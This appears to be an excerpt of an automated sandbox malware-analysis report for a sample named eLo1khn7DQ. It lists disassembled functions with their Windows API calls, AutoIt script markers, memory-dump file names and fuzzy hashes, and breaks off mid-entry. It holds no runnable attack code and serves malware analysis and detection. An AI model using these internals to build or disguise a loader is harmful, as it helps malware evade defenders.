SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00262CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00263006
CloseHandle.KERNEL32(00000000,?,00262CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0026300D

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 273f8d389247ae51a6cb92fc7983c2c6454b65be9b273b46c0b80663f98d9aa3
Instruction ID: 912af5cd696d7b5ee62958fdef92cf83bfa4631561ca91efb6c1697b468d5f78
Opcode Fuzzy Hash: 273f8d389247ae51a6cb92fc7983c2c6454b65be9b273b46c0b80663f98d9aa3
Instruction Fuzzy Hash: 10E0863628121077D2302755BC4DF8B3A1CD78AB71F204210F719750D187B0250153B8

Function 00201310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 002017F6

Strings

CALL, xrefs: 002017C6

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 17f0f9efd97e2de5edc0018a166357a0ad6ce7f598104fe12630e5b08e652f4d
Instruction ID: 5bca5ba215b5a2ac11314bd89043d1d5fb6e5612663d60563e82e9a97dddb619
Opcode Fuzzy Hash: 17f0f9efd97e2de5edc0018a166357a0ad6ce7f598104fe12630e5b08e652f4d
Instruction Fuzzy Hash: E5229A706283429FC718DF14C884A2ABBF1BF89314F54895DF4868B3A2D771E965CF82

Function 00266EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00266F6B

Part of subcall function 001F4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001F4EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00266F5A, 00266F63

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 0bf48717dddb773162b0e07e05258f783a9936d0721e6bbc5ad7f51a2f11db9c
Instruction ID: 83f6eaface588d8c0208aa6970cda521e4696be96c5b9ca6c3393851da3f9948
Opcode Fuzzy Hash: 0bf48717dddb773162b0e07e05258f783a9936d0721e6bbc5ad7f51a2f11db9c
Instruction Fuzzy Hash: 33B1B6711182068FCB14EF24D49197EB7E5BFA4304F04496DF99A872A2DF70ED89CB92

Function 00262557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00262587

Strings

EA06, xrefs: 002625B9

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: b1fd8aeed4934180f7fafdb70adc34b3a2cffcf8e9d33082affbc8f0d1059b45
Instruction ID: 85a533da190b6457bd31b3c9b19b8ba552a9d9cdf190f3deeeb8bb1ed90248a2
Opcode Fuzzy Hash: b1fd8aeed4934180f7fafdb70adc34b3a2cffcf8e9d33082affbc8f0d1059b45
Instruction Fuzzy Hash: F301B572914258BEDF28C7A8CC56EEEBBF89B15301F00455AF553D21C1E5B8E6588B60

Function 0022C9BB Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00222D74: GetLastError.KERNEL32(?,?,00225686,00233CD6,?,00000000,?,00225B6A,?,?,?,?,?,0021E6D1,?,002B8A48), ref: 00222D78
Part of subcall function 00222D74: _free.LIBCMT ref: 00222DAB
Part of subcall function 00222D74: SetLastError.KERNEL32(00000000,?,?,?,?,0021E6D1,?,002B8A48,00000010,001F4F4A,?,?,00000000,00233CD6), ref: 00222DEC
Part of subcall function 00222D74: _abort.LIBCMT ref: 00222DF2

Part of subcall function 0022CADA: _abort.LIBCMT ref: 0022CB0C
Part of subcall function 0022CADA: _free.LIBCMT ref: 0022CB40

Part of subcall function 0022C74F: GetOEMCP.KERNEL32(00000000), ref: 0022C77A

_free.LIBCMT ref: 0022CA33
_free.LIBCMT ref: 0022CA69

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 9be475ba2cded876335e979b2323e7431af535bcb06b5a450ac6ed14f211a3ee
Instruction ID: 52414b4677f32867b8a435daa44917b3b0aa056f8e4898f613b50afaff04a718
Opcode Fuzzy Hash: 9be475ba2cded876335e979b2323e7431af535bcb06b5a450ac6ed14f211a3ee
Instruction Fuzzy Hash: 9C319E32910269BFDB10EFE8F445AADB7E5AF40320F310199E8049B2A2EB725D60CF50

Function 001F3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 001F3908

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 02fcfc96ad2404e534bc58f0fb8103e43462e5fa32d3f0fa164a2ea58d6654df
Instruction ID: 24407f771e216aa184353b8fcdc15240daf711e6281535619c3cbfa49b9af498
Opcode Fuzzy Hash: 02fcfc96ad2404e534bc58f0fb8103e43462e5fa32d3f0fa164a2ea58d6654df
Instruction Fuzzy Hash: F931C3705043459FD720DF24E889BA7BBE4FF49748F00096EFAA983241E775AA54CB52

Function 001F9E90 Relevance: 1.8, APIs: 1, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 654bd9b106cd2ababd2c94f780614072aa1e02ca76e644ebe0e9f82de8f36512
Instruction ID: 4af52a5a0ef7ee6d73211196d0d6e407b8f8781cdf6eec03ca673133a18d8b41
Opcode Fuzzy Hash: 654bd9b106cd2ababd2c94f780614072aa1e02ca76e644ebe0e9f82de8f36512
Instruction Fuzzy Hash: 9AC1F8B5D0020E9BCF14EF98C450AFEB7B5FF14310F958126EA56A7191DB389D82CB52

Function 00E5A078 Relevance: 1.7, APIs: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00E598E8: GetFileAttributesW.KERNELBASE(?), ref: 00E598F3

CreateDirectoryW.KERNELBASE(?,00000000), ref: 00E5A19E

Memory Dump Source

Source File: 00000000.00000002.2383571784.0000000000E59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e59000_eLo1khn7DQ.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 7dcd908110d795b017b977c2adc4678e3b2e236aacba42a757b57e05c8f21db0
Instruction ID: b7cdb565bb4fc0b13bd4f2cb3678f048868defe3574ef1885382ddc9086b3b7b
Opcode Fuzzy Hash: 7dcd908110d795b017b977c2adc4678e3b2e236aacba42a757b57e05c8f21db0
Instruction Fuzzy Hash: 0751D631A1120997DF14EFB0D905BEF7379EF58300F0055A8A909F7180EB799B48CBA6

Function 0020FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0020FD1F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 96f80a39b116905bfbece69ff44b6046cbe4f9a69e6cb4a800c1fac3844ab20a
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 4E311C74A5020ADBD768CF59D591969F7B1FF49300B2482A6E805CFA92D731EDD1CBC0

Function 001F4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 001F4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001F4EDD,?,002C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001F4E9C
Part of subcall function 001F4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001F4EAE
Part of subcall function 001F4E90: FreeLibrary.KERNEL32(00000000,?,?,001F4EDD,?,002C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001F4EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001F4EFD

Part of subcall function 001F4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00233CDE,?,002C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001F4E62
Part of subcall function 001F4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001F4E74
Part of subcall function 001F4E59: FreeLibrary.KERNEL32(00000000,?,?,00233CDE,?,002C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001F4E87

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: fc56f3da2ef815bc6a82e099c088c28d1c56665fc08ada0f7e85d0c4c26bd97c
Instruction ID: f4817eae85c438f292c59f8f270f67af9cd3bbf6d0b7f69da4beaacc0af39cf0
Opcode Fuzzy Hash: fc56f3da2ef815bc6a82e099c088c28d1c56665fc08ada0f7e85d0c4c26bd97c
Instruction Fuzzy Hash: 9A110A31610209ABDF14FF64DC02FBE77A59F60710F20442DF646A71D1EF749A559B60

Function 00228402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00228440

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: bcd540d2192a810e3ff87f5d6e11fa7ebf12f7499587f237fde05e0bfde6aa29
Instruction ID: 1cb9e7c2bc87092989807c8f5a63eaf9e6164ef645cd557a37b9f8ec79bbde07
Opcode Fuzzy Hash: bcd540d2192a810e3ff87f5d6e11fa7ebf12f7499587f237fde05e0bfde6aa29
Instruction Fuzzy Hash: 2C11187590410AAFCB05DF98E94199A7BF5EF48314F144059F808AB312DA71EA21CBA5

Function 0021E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction ID: dd3a2bcfae25ac4015db8e2d4b3bd06f452b9203669fa856305e74db05d1d1de
Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction Fuzzy Hash: ABF0D632531A60E6DA313EA59C05BD633DC9F72330F510715F921921D1CB70D4A589A5

Function 00223820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,002C1444,?,0020FDF5,?,?,001FA976,00000010,002C1440,001F13FC,?,001F13C6,?,001F1129), ref: 00223852

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2b1700f14e4ec612fb9878299de1143e55f8e65423e5ce100bbb9461d8045c91
Instruction ID: 21ea14dd8a2522ba9bcd41e3e985de435c47cdbad99108c6dbe05de2bcc28d87
Opcode Fuzzy Hash: 2b1700f14e4ec612fb9878299de1143e55f8e65423e5ce100bbb9461d8045c91
Instruction Fuzzy Hash: 8AE0553313023276D6206EE2BC04BCA368AAB42BB0F160021BC089E480CB69DD2186E2

Function 00224D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00224D9C

Part of subcall function 002229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0022D7D1,00000000,00000000,00000000,00000000,?,0022D7F8,00000000,00000007,00000000,?,0022DBF5,00000000), ref: 002229DE
Part of subcall function 002229C8: GetLastError.KERNEL32(00000000,?,0022D7D1,00000000,00000000,00000000,00000000,?,0022D7F8,00000000,00000007,00000000,?,0022DBF5,00000000,00000000), ref: 002229F0

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction ID: 962b5c462557543a60ffb4a75b90f4629917f8fafc17f55cfbf56210ed44a90f
Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction Fuzzy Hash: A6E09236110315AF8720DFACE400A82B7F4EF943207208529E89DD3310D331F822CB80

Function 001F4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,002C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001F4F6D

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 26c2338884482598b11ca9fdcc03237f0bbfc40bd7d817e282c2821a03ffb430
Instruction ID: 5aefb8e99c178ad1cb1663ac9db956bb711ef748a3fdea9740982c13be05ce61
Opcode Fuzzy Hash: 26c2338884482598b11ca9fdcc03237f0bbfc40bd7d817e282c2821a03ffb430
Instruction Fuzzy Hash: 01F03071505755CFDB389F68D494823B7E4AF54329321897EE2DE82521C7319884DF50

Function 001F2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001F2DC4

Part of subcall function 001F6B57: _wcslen.LIBCMT ref: 001F6B6A

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 6b463e56d54fee1c1ac5de36dc81239fec124b91f6817e874e779d33ca3aa4c8
Instruction ID: 22152f6423c3d0be30102cb68508d75fa0cf85fd7dc8fae5c082b77d6735a7d7
Opcode Fuzzy Hash: 6b463e56d54fee1c1ac5de36dc81239fec124b91f6817e874e779d33ca3aa4c8
Instruction Fuzzy Hash: 2BE0CD766002245BC72092589C05FEA77DDDFC8790F040071FD09D724CDA70AD808650

Function 00262693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 002626B5

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: d2f425c41440b5107e9a5421bd28f889f680fce303ba8543db49d572829c5da3
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 1AE04FB0619B009FDF395E28E8517F677E89F49300F00086EF69B83252E57268958B4D

Function 001F2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001F3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001F3908

Part of subcall function 001FD730: GetInputState.USER32 ref: 001FD807

SetCurrentDirectoryW.KERNEL32(?), ref: 001F2B6B

Part of subcall function 001F30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 001F314E

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: c99fd0986a404e7ee635b5a3d38d870e60385d1481be371b11ea6f2ef78a3aa7
Instruction ID: ea37703a49eff45bb4c6d1c97ac1575b2bc78a56f2f4766db3094e40d2353c39
Opcode Fuzzy Hash: c99fd0986a404e7ee635b5a3d38d870e60385d1481be371b11ea6f2ef78a3aa7
Instruction Fuzzy Hash: 90E0863130424C06C618BB75B85797DB759DBF2356F40163EF75647163CF2485564351

Function 00E598E8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 00E598F3

Memory Dump Source

Source File: 00000000.00000002.2383571784.0000000000E59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e59000_eLo1khn7DQ.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 3c5e0752ddef72072a1352436afc76435929bd90a7f17e828010c0a31a2ca9db
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: F7E08C7190520CEBCB10CAA88909AED73A8FB48322F105A59EC16E3281D5308E08F660

Function 0023039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00230704,?,?,00000000,?,00230704,00000000,0000000C), ref: 002303B7

Memory Dump Source

